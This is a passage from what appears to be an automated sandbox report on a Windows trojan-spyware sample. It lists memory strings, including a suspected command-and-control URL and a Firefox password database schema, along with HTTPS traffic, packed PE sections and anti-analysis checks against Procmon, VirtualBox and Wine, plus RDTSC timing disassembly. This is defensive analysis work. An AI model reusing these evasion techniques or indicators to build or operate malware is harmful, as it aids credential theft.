Source: wf1Ps82LYF.exe, 00000000.00000002.1617971497.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001052000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz:443/apin.txtPK
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wf1Ps82LYF.exe, 00000000.00000003.1513827510.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49712 version: TLS 1.2

                System Summary

                Source: wf1Ps82LYF.exe | Static PE information: section name: (empty)
                Source: wf1Ps82LYF.exe | Static PE information: section name: .idata
                Source: wf1Ps82LYF.exe | Static PE information: section name: (empty)
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_059E19E0
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_01073F70
                Source: wf1Ps82LYF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wf1Ps82LYF.exe | Static PE information: Section: (empty) ZLIB complexity 0.9974983946917808
                Source: wf1Ps82LYF.exe | Static PE information: Section: avxzjrga ZLIB complexity 0.9949793403811793
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: wf1Ps82LYF.exe, 00000000.00000003.1463378371.0000000005A08000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463596594.00000000059EC000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1486385722.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1486155234.00000000059EE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wf1Ps82LYF.exe | ReversingLabs: Detection: 44%
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File read: C:\Users\user\Desktop\wf1Ps82LYF.exe
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Section loaded: version.dll
                Source: wf1Ps82LYF.exe | Static file information: File size 1884672 > 1048576
                Source: wf1Ps82LYF.exe | Static PE information: Raw size of avxzjrga is bigger than: 0x100000 < 0x1a3c00

                Data Obfuscation

                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Unpacked PE file: 0.2.wf1Ps82LYF.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avxzjrga:EW;vgfnourc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avxzjrga:EW;vgfnourc:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: wf1Ps82LYF.exe | Static PE information: real checksum: 0x1d90b2 should be: 0x1d2192
                Source: wf1Ps82LYF.exe | Static PE information: section name: (empty)
                Source: wf1Ps82LYF.exe | Static PE information: section name: .idata
                Source: wf1Ps82LYF.exe | Static PE information: section name: (empty)
                Source: wf1Ps82LYF.exe | Static PE information: section name: avxzjrga
                Source: wf1Ps82LYF.exe | Static PE information: section name: vgfnourc
                Source: wf1Ps82LYF.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010CE699 pushad ; ret 0_3_010CE69A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010C8DD7 push ebx; retf 0_3_010C8DD8
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010C47AF push ecx; iretd 0_3_010C47B0
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D770D push edx; retf 0_3_010D771A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D6699 push eax; retf 0_3_010D670A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D7F18 push ebx; retf 0_3_010D7F1A
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D9063 push ecx; iretd 0_3_010D9064
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D56FC push esi; retf 0_3_010D5702
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Code function: 0_3_010D76F8 push edx; iretd 0_3_010D76FA
                Source: wf1Ps82LYF.exe | Static PE information: section name: (empty) entropy: 7.9796014648206
                Source: wf1Ps82LYF.exe | Static PE information: section name: avxzjrga entropy: 7.954101941370097

                Boot Survival

                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9057E second address: A9058D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9058D second address: A90592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A90592 second address: A9059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5D20D3D686h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9059E second address: A905AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5D20C24762h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A905AB second address: A905B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6140B second address: A61414 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A61414 second address: A6144A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5D20D3D68Bh 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 jg 00007F5D20D3D686h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9980E second address: A99812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99812 second address: A99818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99B1F second address: A99B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99B23 second address: A99B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99DE2 second address: A99DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99DE7 second address: A99DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D68Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9D130 second address: A9D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5D20C24758h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9D13F second address: A9D14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5D20D3D686h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9F37D second address: A9F387 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9E877 second address: A9E87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9E87B second address: A9E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A682A2 second address: A682A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7ADA second address: AA7AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7AE3 second address: AA7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7AFE second address: AA7B08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D20C24756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C63 second address: AA7C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C67 second address: AA7C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C6F second address: AA7C74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8356 second address: AA835A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA835A second address: AA8360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8360 second address: AA837B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5D20C24761h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA837B second address: AA839B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F5D20D3D686h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA839B second address: AA83B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5D20C24756h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20C2475Ah 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA850D second address: AA851A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5D20D3D68Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8D86 second address: AA8D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24762h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8D9C second address: AA8DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E27 second address: AA8E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E2C second address: AA8E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E32 second address: AA8E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E3E second address: AA8E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D696h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E5D second address: AA8E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20C24768h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA90A1 second address: AA90A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA90A7 second address: AA90AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9ED2 second address: AA9ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9ED6 second address: AA9EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F5D20C24756h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9FC6 second address: AA9FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9FCC second address: AA9FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA070 second address: AAA07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5D20D3D686h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA07F second address: AAA083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA083 second address: AAA0A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D691h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c je 00007F5D20D3D68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1E2 second address: AAA1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1E6 second address: AAA1F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1F0 second address: AAA1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5D20C24756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAB03C second address: AAB040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAB040 second address: AAB0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F5D20C2475Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5D20C24758h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jmp 00007F5D20C24767h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F5D20C24758h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 or dword ptr [ebp+122D1A33h], esi 0x0000004f push 00000000h 0x00000051 add dword ptr [ebp+122D2106h], esi 0x00000057 xchg eax, ebx 0x00000058 jnl 00007F5D20C2475Eh 0x0000005e push eax 0x0000005f push esi 0x00000060 jbe 00007F5D20C2475Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAAF08 second address: AAAF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AACA46 second address: AACA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AACA4A second address: AACA7B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5D20D3D68Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F5D20D3D6A5h 0x00000011 pushad 0x00000012 jmp 00007F5D20D3D697h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
